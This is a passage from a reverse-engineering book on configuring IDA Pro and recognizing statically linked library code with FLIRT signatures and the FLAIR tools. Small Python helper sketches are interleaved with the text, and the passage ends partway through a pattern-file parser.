keys, changing default sequences to sequences that are easier to remember,

or changing sequences that might conflict with other sequences in use by the

operating system or your terminal application (useful primarily for the console

version of IDA).

2. Pedram Amini swears by this WinHelp32 file: http://pedram.redhive.com/openrce/opcodes.hlp.

3. See http://support.microsoft.com/kb/917607.

Virtually every option that IDA makes available through menu items
or toolbar buttons is listed in this section. Unfortunately, the names of the
commands tend not to match the text used on IDA’s menus, so it may take
some effort to determine exactly which configuration file option maps to a
specific menu option. For example, the Jump▸Jump to Problem command
equates to the JumpQ option (which does happen to match its hotkey: CTRL-Q)
in idagui.cfg. In addition, while many commands have matching comments to
describe their purpose, many commands have no description at all, so you

are left to determine the behavior of a command based on its name within

the configuration file. A trick that may help you figure out what menu item

a configuration file action is associated with is to search for the action in IDA’s

help system. The results of such searches usually lead to the description of

the action’s corresponding menu item.

The following lines represent example hotkey assignments in idagui.cfg:

"Abort" = 0 // Abort IDA, don't save changes

"Quit" = "Alt-X" // Quit to DOS, save changes

The first line is the hotkey assignment for IDA’s Abort command, which

in this case has no hotkey assignment. The unquoted value 0 indicates that

no hotkey has been assigned to a command. The second line shows the hot-

key assignment for IDA’s Quit action. Hotkey sequences are specified as a

quoted string naming the key sequence. Numerous examples of hotkey

assignments exist within idagui.cfg.
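When hunting for a free key sequence or auditing your own changes, it can help to list the assignments programmatically. The following Python sketch extracts action names and hotkeys from lines in the format shown above. The regular expression and the parse_hotkeys name are our own, and the sketch handles only the two forms illustrated (a quoted key sequence or an unquoted 0).

```python
import re

# "Action" = "Key-Sequence"   or   "Action" = 0   (trailing // comments are ignored)
HOTKEY_LINE = re.compile(r'^\s*"(?P<action>[^"]+)"\s*=\s*(?P<key>"[^"]*"|0)')

def parse_hotkeys(text):
    """Map each action name to its hotkey string, or None when unassigned."""
    hotkeys = {}
    for line in text.splitlines():
        match = HOTKEY_LINE.match(line)
        if match:
            key = match.group("key")
            hotkeys[match.group("action")] = None if key == "0" else key.strip('"')
    return hotkeys

sample = '''"Abort" = 0 // Abort IDA, don't save changes
"Quit" = "Alt-X" // Quit to DOS, save changes
'''
print(parse_hotkeys(sample))
```

Inverting the resulting dictionary gives a quick way to spot two actions that have been bound to the same sequence.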

The final portion of idagui.cfg associates file type descriptions with their

associated file extensions and specifies which file types will be listed in the

Files of type drop-down list within the File▸Open dialog. A large number of

file types are already described in the configuration file; however, if you find

yourself frequently working with a file type that is not available, you may want

to edit the file types list to add your file type to the list. The FILE_EXTENSIONS

option describes all file associations known to IDA. The following line is an

example of a typical file type association.

CLASS_JAVA, "Java Class Files", "*.cla*;*.cls"

The line contains three comma-separated components: a name for the

association (CLASS_JAVA), a description, and a filename pattern. Wildcards are

allowed in the filename pattern, and multiple patterns can be specified by

using a semicolon to separate them. A second type of file association allows

several existing associations to be grouped into a single category. For example,

the following line groups all associations whose names begin with EXE_ into a

single association named EXE.

EXE, "Executable Files", EXE_*

Note that the pattern specifier in this case is not quoted. We might

define our own file association as follows:

IDA_BOOK, "Ida Book Files", "*.book"


We can choose any name we like for the association as long as it is not

already in use; however, simply adding a new association to the FILE_EXTENSIONS

list is not sufficient to make that association appear in the File▸Open dialog.
The DEFAULT_FILE_FILTER option lists the names of all associations that will
appear in the File▸Open dialog. To complete the process and make our new

association available, we would need to add IDA_BOOK to the DEFAULT_FILE_FILTER

list. As with ida.cfg and idauser.cfg, the last line in idagui.cfg contains a directive to

include a file named <IDADIR>/cfg/idauserg.cfg. If you do not feel comfortable

editing idagui.cfg, then you should create idauserg.cfg and add to it all of the

options that you wish to override.
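Before adding a new association, you may want to confirm that its filename pattern matches the files you have in mind. The following Python sketch tests a filename against a semicolon-separated pattern list like those used in FILE_EXTENSIONS. It uses Python's fnmatch wildcards as a stand-in for IDA's own matching, and the case-insensitive comparison is an assumption on our part.

```python
from fnmatch import fnmatch

def matches_association(filename, pattern_list):
    """True if filename matches any pattern in a list such as "*.cla*;*.cls"."""
    name = filename.lower()
    return any(fnmatch(name, pattern.lower()) for pattern in pattern_list.split(";"))

print(matches_association("Hello.class", "*.cla*;*.cls"))
print(matches_association("notes.book", "*.book"))
```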

The Console Configuration File: idatui.cfg

The analog to idagui.cfg for users of the console version of IDA is
<IDADIR>/cfg/idatui.cfg. This file is very similar in layout and functionality to idagui.cfg.

Among other things, hotkey specifications are made in the exact same manner

as they are in idagui.cfg. Because the two files are so similar, we will detail only

the differences here.

First, the options DISPLAY_PATCH_SUBMENU and DISPLAY_COMMAND_LINE are

not available in the console version and are not included in idatui.cfg. The

FileOpen dialog used in the console version is far simpler than the dialog

used in the GUI version, so all of the file association commands available in

idagui.cfg are missing in idatui.cfg.

On the other hand, a few options are available only for console versions

of IDA. For example, you can use the NOVICE option to have IDA start in a

beginner mode, in which it disables some of its more complex functionality

in an attempt to be easier to learn. A notable difference in novice mode is

the almost complete lack of subviews.

Console users are far more likely to rely on the use of hotkey sequences.

To facilitate the automation of common hotkey sequences, console mode

IDA provides a keyboard macro definition syntax. Several example macros

can be found in idatui.cfg; however, the ideal location to place any macros

that you develop is <IDADIR>/cfg/idausert.cfg (the console equivalent of

idauserg.cfg). A sample macro contained in the default idatui.cfg might look

like the following (in the actual idatui.cfg, this macro is commented out):

➊ MACRO ➋ "Alt-H" // this sample macro jumps to "start" label
{
    "G"
    's' 't' 'a' 'r' 't'
    "Enter"
}

Macro definitions are introduced with the MACRO keyword ➊ followed by
the hotkey ➋ to be associated with the macro. The macro sequence itself is

specified between braces as a sequence of key name strings or characters,

which may in turn represent hotkey sequences themselves. The preceding

example macro, activated using ALT-H, opens the Jump to Address dialog

using the G hotkey, enters the label start into the dialog one character at a

time, and then closes the dialog using the ENTER key. Note that we could not

use the syntax “start” to enter the name of the symbol, as this would be taken

as the name of a hotkey and result in an error.
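Because labels must be spelled out one character at a time, writing several jump macros by hand quickly becomes tedious. The following Python sketch generates the text of such a macro for an arbitrary label. jump_macro is a hypothetical helper of our own. It assumes the macro syntax shown above and does not handle labels that contain quote characters.

```python
def jump_macro(hotkey, label):
    """Return idausert.cfg text for a macro that jumps to label via the G hotkey."""
    # Each character of the label becomes its own single-quoted key.
    keys = " ".join("'" + ch + "'" for ch in label)
    return "\n".join([
        f'MACRO "{hotkey}"',
        "{",
        '    "G"',          # open the Jump to Address dialog
        f"    {keys}",      # type the label one character at a time
        '    "Enter"',      # accept the dialog
        "}",
    ]) + "\n"

print(jump_macro("Alt-H", "start"))
```

The generated text is intended to be pasted into <IDADIR>/cfg/idausert.cfg. Choose a hotkey that is not already assigned elsewhere in idatui.cfg.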

NOTE Macros and novice mode are not available in the GUI version of IDA.

As a final note about configuration file options, it is important to know

that if IDA encounters any errors while parsing its configuration files, it

immediately terminates with an error message that attempts to describe the

nature of the problem. It is not possible to start IDA until the error condition

has been corrected.

Additional IDA Configuration Options

IDA has a tremendous number of additional options that must be configured

through the IDA user interface. Options for formatting individual disassembly

lines were discussed in Chapter 7. Additional IDA options are accessed via

the Options menu, and in most cases, any options that you modify apply only

to the currently opened database. Values for those options are stored in the

associated database file when the database is closed. IDA’s Color
(Options▸Colors) and Font (Options▸Font) options are two of the exceptions to this

rule in that they are global options that, once set, remain in effect in all future

IDA sessions. For Windows versions of IDA, option values are stored in the

Windows registry under the HKEY_CURRENT_USER\Software\Hex-Rays\IDA registry

key. For non-Windows versions of IDA, these values are stored in your home

directory in a proprietary format file named $HOME/.idapro/ida.reg.

Another piece of information that is saved in the registry concerns dialogs

for which you may choose the Do not display this dialog box again option.

This message occasionally appears in the form of a checkbox in the lower-

right portion of some informational message dialogs that you may not wish

to see in the future. Should you select this option, a registry value is created

under the HKEY_CURRENT_USER\Software\Hex-Rays\IDA\Hidden Messages registry

key. If, at a later time, you wish to have a hidden dialog displayed once again,

you will need to delete the appropriate value under this registry key.

IDA Colors

The color of virtually every item in an IDA display can be customized via the

OptionsColors dialog shown in Figure 11-1.


Figure 11-1: The color selection dialog

The Disassembly tab controls the colors used for various parts of each line

in the disassembly window. Examples of each type of text that can appear in a

disassembly are given in the example window ➊. When you select an item in
the example window, the item’s type is listed at ➋. Using the Change Color

button, you may assign any color you wish to any item you wish.

The color selection dialog contains tabs for assigning colors used in the

navigation band, the debugger, the jump arrows in the left margin of the text

disassembly view, and various components in the graph view. Specifically, the

Graph tab controls the coloring of graph nodes, their title bars, and the edges

that connect each node, while the Disassembly tab controls the coloring of

disassembled text in the graph view. The Misc tab allows for customizing the

colors used in IDA’s message window.

Customizing IDA Toolbars

In addition to menus and hotkeys, the GUI version of IDA offers a large

number of toolbar buttons spread across more than two dozen toolbars.

Toolbars are typically docked in the main toolbar area beneath IDA’s menu

bar. Two predefined toolbar arrangements accessible using the
View▸Toolbars menu are Basic mode, which enables seven of IDA’s toolbars, and

Advanced mode, which enables every IDA toolbar. Individual toolbars can be

detached, dragged, and relocated to any location on the screen to suit your

personal taste. If you find that you have no need for a particular toolbar, you

can remove it from the display entirely via the View▸Toolbars menu, which

is shown in Figure 11-2.

This menu also appears if you right-click anywhere within the docking

area of the IDA display. Turning off the Main toolbar removes all toolbars

from the docking area and is useful if you need to maximize the amount

of screen space dedicated to the disassembly window. Any changes that you

make to your toolbar arrangement are stored with the current database.


Opening a second database will restore the toolbars to the arrangement that

was in effect when the second database was last saved. Opening a new binary to

create a new database restores the toolbar arrangement based on IDA’s cur-

rent default toolbar settings.

Figure 11-2: The toolbar configuration menu

If you settle on a toolbar arrangement that you happen to like and wish

to make it the default, then you should save the current desktop arrangement

as your default desktop using Windows▸Save Desktop, which opens the

dialog shown in Figure 11-3.

Figure 11-3: The Save Disassembly Desktop dialog

Each time you save a desktop configuration, you are asked to supply a

name for the configuration. When the Default checkbox is selected, the

current desktop layout becomes the default for all new databases and the

desktop to which you will revert if you choose Windows▸Reset desktop. To
restore the display to one of your custom desktops, select Windows▸Load
Desktop and choose the named layout that you wish to load. Saving and

restoring desktops is particularly useful in situations that involve using mul-

tiple monitors with different sizes and/or resolutions (which may be com-

mon with laptops using different docking stations or when connecting

to projectors for presentations).


Summary

When starting out with IDA, you may be perfectly satisfied with both its

default behaviors and its default GUI layout. As you become more comfort-

able with IDA’s basic features, you are certain to find ways to customize IDA

to your particular tastes. While there is no way to provide complete coverage

of every possible option IDA offers in a single chapter, we have attempted

to provide pointers to the principal locations in which those options may be

found. We have also attempted to highlight those options that you are most

likely to want to manipulate at some point in your IDA experience. Discover-

ing additional useful options is left as a matter of exploration for inquisitive

readers.


LIBRARY RECOGNITION USING FLIRT SIGNATURES

At this point it is time to start moving

beyond IDA’s more obvious capabilities

and begin our exploration of what to do after

“The initial autoanalysis has been finished.”1 In

this chapter we discuss techniques for recognizing

standard code sequences such as the library code con-

tained in statically linked binaries or standard initializa-

tion and helper functions inserted by compilers.

1. IDA generates this message in the Output window when it has finished its automated
processing of a newly loaded binary.

When you set out to reverse engineer any binary, the last thing that
you want to do is waste time reverse engineering library functions whose
behavior you could learn much more easily simply by reading a man page,
reading some source code, or doing a little Internet research. The challenge
presented by statically linked binaries is that they blur the distinction between
application code and library code. In a statically linked binary, entire libraries
are combined with application code to form a single monolithic executable

file. Fortunately for us, tools are available that enable IDA to recognize and

mark library code, allowing us to focus our attention on the unique code

within the application.

Fast Library Identification and Recognition Technology

Fast Library Identification and Recognition Technology, better known as

FLIRT,2 encompasses the set of techniques employed by IDA to identify

sequences of code as library code. At the heart of FLIRT are pattern-matching

algorithms that enable IDA to quickly determine whether a disassembled

function matches one of the many signatures known to IDA. The <IDADIR>/sig

directory contains the signature files that ship with IDA. For the most part,

these are libraries that ship with common Windows compilers, though a few

non-Windows signatures are also included.

Signature files utilize a custom format in which the bulk of the signature

data is compressed and wrapped in an IDA-specific header. In most cases,

signature filenames do not clearly indicate which library the associated sig-

natures were generated from. Depending on how they were created, signature

files may contain a library name comment that describes their contents. If we

view the first few lines of extracted ASCII content from a signature file, this

comment is often revealed. The following Unix-style command3 generally

reveals the comment in the second or third line of output:

# strings sigfile | head -n 3
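On systems without the strings and head utilities, a few lines of Python provide a rough equivalent. The following sketch extracts runs of printable ASCII characters from a file's contents and returns the first few. It only approximates the behavior of strings (which, for example, has its own rules for whitespace and minimum length), and first_strings is a name of our own choosing.

```python
import re

def first_strings(data, count=3, min_length=4):
    """Return the first count runs of printable ASCII found in data (bytes)."""
    # A run is min_length or more consecutive bytes in the range 0x20-0x7e.
    runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_length, data)
    return [run.decode("ascii") for run in runs[:count]]

sample = b"\x00\x01HEADER\x00ab\x00Example C runtime library\x00\xffxyz1\x00tail text"
print(first_strings(sample))
```

For a real signature file, read its contents with open(path, "rb").read() and pass the resulting bytes to first_strings.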

Within IDA, there are two ways to view comments associated with signature

files. First, you can access the list of signatures that have been applied to a

binary via ViewOpen SubviewsSignatures. Second, the list of all signature

files is displayed as part of the manual signature application process, which is

initiated via FileLoad FileFLIRT Signature File.

Applying FLIRT Signatures

When a binary is first opened, IDA attempts to apply special signature files,

designated as startup signatures, to the entry point of the binary. It turns

out that the entry point code generated by various compilers is sufficiently

unique that matching entry point signatures is a useful technique for iden-

tifying the compiler that may have been used to generate a given binary.

2. See http://www.hex-rays.com/idapro/flirt.htm.

3. The strings command was discussed in Chapter 2, while the head command is used to view

only the first few lines (three in the example) of its input source.

Library Recognition Using FLIRT Signatures 213

If IDA identifies the compiler used to create a particular binary, then the

signature file for the corresponding compiler libraries is loaded and applied

to the remainder of the binary. The signatures that ship with IDA tend to

be related to proprietary compilers such as Microsoft Visual C++ or Borland

Delphi. The reason behind this is that a finite number of binary libraries ship

with these compilers. For open source compilers, such as GNU gcc, the binary

variations of the associated libraries are as numerous as the operating systems

the compilers ship with. For example, each version of FreeBSD ships with

a unique version of the C standard library. For optimal pattern matching,

signature files would need to be generated for each version of the library.

Consider the difficulty in collecting every variation of libc.a[4] that has shipped

with every version of every Linux distribution. It simply is not practical. In part,

these differences are due to changes in the library source code that result

in different compiled code, but huge differences also result from the use

of different compilation options, such as optimization settings and the use of

different compiler versions to build the library. The net result is that IDA

ships with very few signature files for open source compiler libraries. The good

news, as you shall soon see, is that Hex-Rays makes tools available that allow

you to generate your own signature files from static libraries.

So, under what circumstances might you be required to manually apply

signatures to one of your databases? Occasionally IDA properly identifies

the compiler used to build the binary but has no signatures for the related

compiler libraries. In such cases, either you will need to live without signatures,

or you will need to obtain copies of the static libraries used in the binary and

generate your own signatures. Other times, IDA may simply fail to identify

a compiler, making it impossible to determine which signatures should be

4. libc.a is the version of the C standard library used in statically linked binaries on Unix-style

systems.

MAIN VS. _START

Recall that a program’s entry point is the address of the first instruction that will be

executed. Many longtime C programmers incorrectly believe that this is the address

of the function named main, when in fact it is not. The file type of the program, not

the language used to create the program, dictates the manner in which command-

line arguments are provided to a program. In order to reconcile any differences

between the way the loader presents command-line arguments and the way the pro-

gram expects to receive them (via parameters to main, for example), some initializa-

tion code must execute prior to transferring control to main. It is this initialization that

IDA designates as the entry point of the program and labels _start.

This initialization code is also responsible for any initialization tasks that must

take place before main is allowed to run. In a C++ program, this code is responsible

for ensuring that constructors for globally declared objects are called prior to execu-

tion of main. Similarly, cleanup code is inserted that executes after main completes

in order to invoke destructors for all global objects prior to the actual termination of

the program.


applied to a database. This is common when analyzing obfuscated code in

which the startup routines have been sufficiently mangled to preclude com-

piler identification. The first thing to do, then, would be to de-obfuscate

the binary sufficiently before you could have any hope of matching library

signatures. We will discuss techniques for dealing with obfuscated code in

Chapter 21.

Regardless of the reason, if you wish to manually apply signatures to a

database, you do so via File ▸ Load File ▸ FLIRT Signature File, which opens

the signature selection dialog shown in Figure 12-1.

Figure 12-1: FLIRT signature selection

The File column reflects the name of each .sig file in IDA’s <IDADIR>/sig

directory. Note that there is no means to specify an alternate location for .sig

files. If you ever generate your own signatures, they need to be placed into

<IDADIR>/sig along with every other .sig file. The Library name column dis-

plays the library name comment that is embedded within each file. Keep in

mind that these comments are only as descriptive as the creator of the signa-

tures (which could be you!) chooses to make them.

When a library module is selected, the signatures contained in the cor-

responding .sig file are loaded and compared against every function within

the database. Only one set of signatures may be applied at a time, so you

will need to repeat the process if you wish to apply several different signature

files to a database. When a function is found to match a signature, the func-

tion is marked as a library function, and the function is automatically renamed

according to the signature that has been matched.

WARNING Only functions named with an IDA dummy name can be automatically renamed. In

other words, if you have renamed a function, and that function is later matched by a

signature, then the function will not be renamed as a result of the match. Therefore, it

is to your benefit to apply signatures as early in your analysis process as possible.
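Before applying signatures late in an analysis, it can help to know which functions have already been renamed and will therefore keep their current names. The sketch below works on a plain list of names rather than on a live database. It assumes that IDA's dummy function names take the form sub_ followed by a hexadecimal address; other auto-generated prefixes are deliberately ignored, and both helper names are hypothetical.

```python
import re

# Assumption: an IDA dummy function name is "sub_" plus a hex address.
_DUMMY_FUNCTION_NAME = re.compile(r"^sub_[0-9A-Fa-f]+$")


def is_dummy_function_name(name: str) -> bool:
    """True if the name looks like an IDA-generated dummy function name."""
    return _DUMMY_FUNCTION_NAME.match(name) is not None


def names_blocking_rename(names):
    """Return the names that a later signature match would not replace."""
    return [name for name in names if not is_dummy_function_name(name)]
```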

Recall that statically linked binaries blur the distinction between applica-

tion code and library code. If you are fortunate enough to have a statically

linked binary that has not had its symbols stripped, you will at least have

useful function names (as useful as the trustworthy programmer has chosen


to create) to help you sort your way through the code. However, if the binary

has been stripped, you will have perhaps hundreds of functions, all with

IDA-generated names that fail to indicate what the function does. In both

cases, IDA will be able to identify library functions only if signatures are

available (function names in an unstripped binary do not provide IDA with

enough information to definitively identify a function as a library function).

Figure 12-2 shows the Overview Navigator for a statically linked binary.

Figure 12-2: Statically linked with no signatures

In this display, no functions have been identified as library functions, so

you may find yourself analyzing far more code than you really need to. After

application of an appropriate set of signatures, the Overview Navigator is

transformed as shown in Figure 12-3.

Figure 12-3: Statically linked binary with signatures applied

As you can see, the Overview Navigator provides the best indication of

the effectiveness of a particular set of signatures. With a large percentage of

matched signatures, substantial portions of code will be marked as library

code and renamed accordingly. In the example in Figure 12-3, it is highly

likely that the actual application-specific code is concentrated in the far left

portion of the navigator display.

There are two points worth remembering when applying signatures.

First, signatures are useful even when working with a binary that has not

been stripped, in which case you are using signatures more to help IDA

identify library functions than to rename those functions. Second, statically

linked binaries may be composed of several separate libraries, requiring the

application of several sets of signatures in order to completely identify all

library functions. With each additional signature application, additional

portions of the Overview Navigator will be transformed to reflect the discovery

of library code. Figure 12-4 shows one such example. In this figure, you see

a binary that was statically linked with both the C standard library and the

OpenSSL[5] cryptographic library.

Figure 12-4: Static binary with first of several signatures applied

5. See http://www.openssl.org/.


Specifically, you see that following application of the appropriate signa-

tures for the version of OpenSSL in use in this application, IDA has marked

a small band (the lighter band toward the left edge of the address range) as

library code. Statically linked binaries are often created by taking the applica-

tion code first and then appending required libraries to create the resulting

executable. Given this picture, we can conclude that the memory space to

the right of the OpenSSL library is likely occupied by additional library code,

while the application code is most likely in the very narrow band to the left of

the OpenSSL library. If we continue to apply signatures to the binary shown

in Figure 12-4, we eventually arrive at the display of Figure 12-5.

Figure 12-5: Static binary following application of several signatures

In this example, we have applied signatures for libc, libcrypto, libkrb5,

libresolv, and others. In some cases we selected signatures based on strings

located within the binary; in other cases we chose signatures based on their

close relationship to other libraries already located within the binary. The

resulting display continues to show a dark band in the middle of the naviga-

tion band and a smaller dark band at the extreme left edge of the navigation

band. Further analysis is required to determine the nature of these remaining

nonlibrary portions of the binary. In this case we would learn that the wider

dark band in the middle is part of an unidentified library, while the dark

band on the left is the application code.

Creating FLIRT Signature Files

As we discussed previously, it is simply impractical for IDA to ship with signa-

ture files for every static library in existence. In order to provide IDA users

with the tools and information necessary to create their own signatures, Hex-

Rays distributes the Fast Library Acquisition for Identification and Recogni-

tion (FLAIR) tool set. The FLAIR tools are made available on your IDA

distribution CD or via download from the Hex-Rays website[6] for authorized

customers. Like several other IDA add-ons, the FLAIR tools are distributed in

a Zip file. Hex-Rays does not necessarily release a new version of the FLAIR

tools with each version of IDA, so you should use the most recent version of

FLAIR that does not exceed your version of IDA.

Installation of the FLAIR utilities is a simple matter of extracting the

contents of the associated Zip file, though we highly recommend that you

create a dedicated flair directory as the destination because the Zip file is not

organized with a top-level directory. Inside the FLAIR distribution you will

6. The current version is flair61.zip and is available here: http://www.hex-rays.com/idapro/ida/

flair61.zip. A username and password supplied by Hex-Rays are required to access the download.


find several text files that constitute the documentation for the FLAIR tools.

Files of particular interest include these:

readme.txt

This is a top-level overview of the signature-creation process.

plb.txt

This file describes the use of the static library parser, plb.exe. Library pars-

ers are discussed in more detail in “Creating Pattern Files” on page 219.

pat.txt

This file details the format of pattern files, which represent the first

step in the signature-creation process. Pattern files are also described

in “Creating Pattern Files” on page 219.

sigmake.txt

This file describes the use of sigmake.exe for generating .sig files from

pattern files. Please refer to “Creating Signature Files” on page 221 for

more details.

Additional top-level content of interest includes the bin directory, which

contains all of the FLAIR tools executable files, and the startup directory,

which contains pattern files for common startup sequences associated with

various compilers and their associated output file types (PE, ELF, and so on).

Prior to version 6.1, the FLAIR tools were available for Windows only; however,

the resulting signature files may be used with all IDA variants (Windows,

Linux, and OS X).

Signature-Creation Overview

The basic process for creating signature files does not seem complicated, as

it boils down to four simple-sounding steps.

1. Obtain a copy of the static library for which you wish to create a signa-

ture file.

2. Utilize one of the FLAIR parsers to create a pattern file for the library.

3. Run sigmake.exe to process the resulting pattern file and generate a

signature file.

4. Install the new signature file in IDA by copying it to <IDADIR>/sig.

Unfortunately, in practice, only the last step is as easy as it sounds. In the

following sections, we discuss the first three steps in more detail.
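The four steps can be laid out as a sequence of command lines. The sketch below only builds those command lines; it does not run anything. The function name signature_build_plan is hypothetical, the tool names and the -n option are those used in this chapter's examples, and the final cp command assumes a Unix-style shell.

```python
from pathlib import PurePosixPath


def signature_build_plan(library, parser, ida_dir, description=""):
    """Return the commands for steps 2 through 4 as argument lists.

    Step 1, obtaining the static library itself, cannot be automated here.
    """
    stem = PurePosixPath(library).stem
    pat_file = f"{stem}.pat"
    sig_file = f"{stem}.sig"
    sigmake = ["./sigmake"]
    if description:
        # -n embeds a library name comment in the signature file.
        sigmake.append(f"-n{description}")
    sigmake += [pat_file, sig_file]
    return [
        [f"./{parser}", library, pat_file],                       # step 2
        sigmake,                                                  # step 3
        ["cp", sig_file, str(PurePosixPath(ida_dir) / "sig")],   # step 4
    ]
```

Each inner list is suitable for passing to subprocess.run once the FLAIR tools are in the current directory. Expect step 3 to need more than one pass when collisions are reported.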

Identifying and Acquiring Static Libraries

The first step in the signature-generation process is to locate a copy of the

static library for which you wish to generate signatures. This can pose a bit of

a challenge for a variety of reasons. The first obstacle is to determine which

library you actually need. If the binary you are analyzing has not been stripped,


you might be lucky enough to have actual function names available in your

disassembly, in which case an Internet search will probably provide several

pointers to likely candidates.

Stripped binaries are not quite as forthcoming regarding their origins.

Lacking function names, you may find that a good strings search may yield

sufficiently unique strings to allow for library identification, such as the follow-

ing, which is a dead giveaway:

OpenSSL 1.0.0b-fips 16 Nov 2010

Once again, you can use an Internet search to narrow your candidates. If you

choose to run strings from the command line, remember to use the -a

option to force strings to scan the entire binary; otherwise you may miss

some potentially useful string data.

In the case of open source libraries, you are likely to find source code

readily available. Unfortunately, while the source code may be useful in help-

ing you understand the behavior of the binary, you cannot use it to generate

your signatures. It might be possible to use the source to build your own ver-

sion of the static library and then use that version in the signature-generation

process. However, in all likelihood, variations in the build process will result

in enough differences between the resulting library and the library you are

analyzing that any signatures you generate will not be terribly accurate.

The best option is to attempt to determine the exact origin of the binary

in question. By this we mean the exact operating system, operating system

version, and distribution (if applicable). Given this information, the best

option for creating signatures is to copy the libraries in question from an

identically configured system. Naturally, this leads to the next challenge:

Given an arbitrary binary, on what system was it created? A good first step

is to use the file utility to obtain some preliminary information about the

binary in question. In Chapter 2 we saw some sample output from file. In

several cases, this output was sufficient to provide likely candidate systems.

The following is just one example of very specific output from file:

$ file sample_file_1

sample_file_1: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD),

statically linked, for FreeBSD 8.0 (800107), stripped

In this case we might head straight to a FreeBSD 8.0 system and track

down libc.a for starters. The following example is somewhat more ambiguous,

however:

$ file sample_file_2

sample_file_2: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux),

statically linked, for GNU/Linux 2.6.32, stripped


We appear to have narrowed the source of the file to a Linux system,

which, given the abundance of available Linux distributions, is not saying

much. Turning to strings we find the following:

GCC: (GNU) 4.5.1 20100924 (Red Hat 4.5.1-4)

Here the search has been narrowed to Red Hat distributions (or deriv-

atives) that shipped with gcc version 4.5.1. GCC tags such as this are not

uncommon in binaries compiled using gcc, and fortunately for us, they

survive the stripping process and remain visible to strings.
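Searching for these tags is easy to script. The following sketch scans the raw bytes of a binary for printable runs that begin with "GCC: (" and returns each distinct tag once. The function name gcc_tags is our own, and the pattern assumes the tag format shown above; other compilers leave different markers, if any.

```python
import re

# A tag is taken to be "GCC: (" followed by a run of printable ASCII.
GCC_TAG = re.compile(rb"GCC: \([\x20-\x7e]*")


def gcc_tags(data: bytes) -> list:
    """Return the distinct GCC version tags found in `data`, in order."""
    seen = []
    for match in GCC_TAG.finditer(data):
        tag = match.group().decode("ascii").strip()
        if tag not in seen:
            seen.append(tag)
    return seen
```

A binary built from objects produced by different compiler versions may carry several distinct tags, which is itself a useful clue about how it was assembled.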

Keep in mind that the file utility is not the be-all and end-all in file

identification. The following output demonstrates a simple case in which

file seems to know the type of the file being examined but for which the

output is rather nonspecific.

$ file sample_file_3

sample_file_3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),

dynamically linked (uses shared libs), stripped

This example was taken from a Solaris 10 x86 system. Here again, the

strings utility might be useful in pinpointing this fact.
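The operating system name that file prints in parentheses corresponds, as far as we can tell, to the OS/ABI byte in the ELF identification header, which is why a Solaris binary that leaves this byte at zero is reported only as SYSV. The sketch below decodes the first few identification bytes by hand. The function name is hypothetical, only a handful of OS/ABI values are listed, and the "for FreeBSD 8.0" style detail in the earlier examples comes from elsewhere in the file and is not reproduced here.

```python
ELF_CLASS = {1: "32-bit", 2: "64-bit"}
ELF_DATA = {1: "LSB", 2: "MSB"}
# A few OS/ABI values from the ELF specification; the table is not complete.
ELF_OSABI = {0: "SYSV", 3: "GNU/Linux", 6: "Solaris", 9: "FreeBSD"}


def describe_elf_ident(header: bytes) -> str:
    """Summarize the 16-byte e_ident array at the start of an ELF file."""
    if len(header) < 16 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    elf_class = ELF_CLASS.get(header[4], "unknown class")    # EI_CLASS
    byte_order = ELF_DATA.get(header[5], "unknown order")    # EI_DATA
    version = header[6]                                      # EI_VERSION
    osabi = ELF_OSABI.get(header[7], f"OSABI {header[7]}")   # EI_OSABI
    return f"ELF {elf_class} {byte_order}, version {version} ({osabi})"
```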

Creating Pattern Files

At this point you should have one or more libraries for which you wish to

create signatures. The next step is to create a pattern file for each library.

Pattern files are created using an appropriate FLAIR parser utility. Like

executable files, library files are built to various file format specifications.

FLAIR provides parsers for several popular library file formats. As detailed

in FLAIR’s readme.txt file, the following parsers can be found in FLAIR’s bin

directory:

plb.exe/plb

Parser for OMF libraries (commonly used by Borland compilers)

pcf.exe/pcf

Parser for COFF libraries (commonly used by Microsoft compilers)

pelf.exe/pelf

Parser for ELF libraries (found on many Unix systems)

ppsx.exe/ppsx

Parser for Sony PlayStation PSX libraries

ptmobj.exe/ptmobj

Parser for TriMedia libraries

pomf166.exe/pomf166

Parser for Keil OMF 166 object files


To create a pattern file for a given library, specify the parser that corre-

sponds to the library’s format, the name of the library you wish to parse,

and the name of the resulting pattern file that should be generated. For a

copy of libc.a from a FreeBSD 8.0 system, you might use the following:

$ ./pelf libc.a libc_FreeBSD80.pat

libc.a: skipped 1, total 1089

Here, the parser reports the file that was parsed (libc.a), the number of

functions that were skipped (1),[7] and the number of signature patterns

that were generated (1089). Each parser accepts a slightly different set of

command-line options documented only through the parser’s usage state-

ment. Executing a parser with no arguments displays the list of command-

line options accepted by that parser. The plb.txt file contains more detailed

information on the options accepted by the plb parser. This file is a good

basic source of information, since other parsers accept many of the options

it describes as well. In many cases, simply naming the library to be parsed and

the pattern file to be generated is sufficient.

A pattern file is a text file that contains, one per line, the extracted pat-

terns that represent functions within a parsed library. A few lines from the

pattern file created previously are shown here:

57568B7C240C8B742410FC8B4C2414C1E902F3A775108B4C241483E103F3A675 1E A55D 003E :0000 _memcmp

0FBC442404740340C39031C0C3...................................... 00 0000 000D :0000 _ffs

57538B7C240C8B4C2410FC31C083F90F7E1B89FAF7DA83E20389CB29D389D1F3 12 9E31 0032 :0000 _bzero

The format of an individual pattern is described in FLAIR’s pat.txt file. In

a nutshell, the first portion of a pattern lists the initial byte sequence of the

function to a maximum of 32 bytes. Allowance is made for bytes that may vary

as a result of relocation entries. Such bytes are displayed using two dots. Dots

are also used to fill the pattern out to 64 characters[8] when a function is shorter

than 32 bytes (as _ffs is in the previous code). Beyond the initial 32 bytes,

additional information is recorded to provide more precision in the signature-

matching process. Additional information encoded into each pattern line

includes a CRC16[9] value computed over a portion of the function, the length

of the function in bytes, and a list of symbol names referenced by the function.

In general, longer functions that reference many other symbols yield more

complex pattern lines. In the file libc_FreeBSD80.pat generated previously,

some pattern lines exceed 20,000 characters in length.
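To make the layout concrete, the following sketch splits a simple pattern line into its fields. It is a reading aid rather than a full parser: the field meanings follow our reading of pat.txt, in particular the assumption that the two-digit field is the number of bytes covered by the CRC16, and only names introduced by a colon-prefixed offset are collected. Referenced names and any trailing bytes are ignored, and all identifiers are our own.

```python
from dataclasses import dataclass


@dataclass
class PatternLine:
    lead_bytes: str      # 64 characters: hex digits, or ".." for wildcards
    crc_length: int      # assumed: number of bytes covered by the CRC16
    crc16: int
    total_length: int    # length of the function in bytes
    public_names: list


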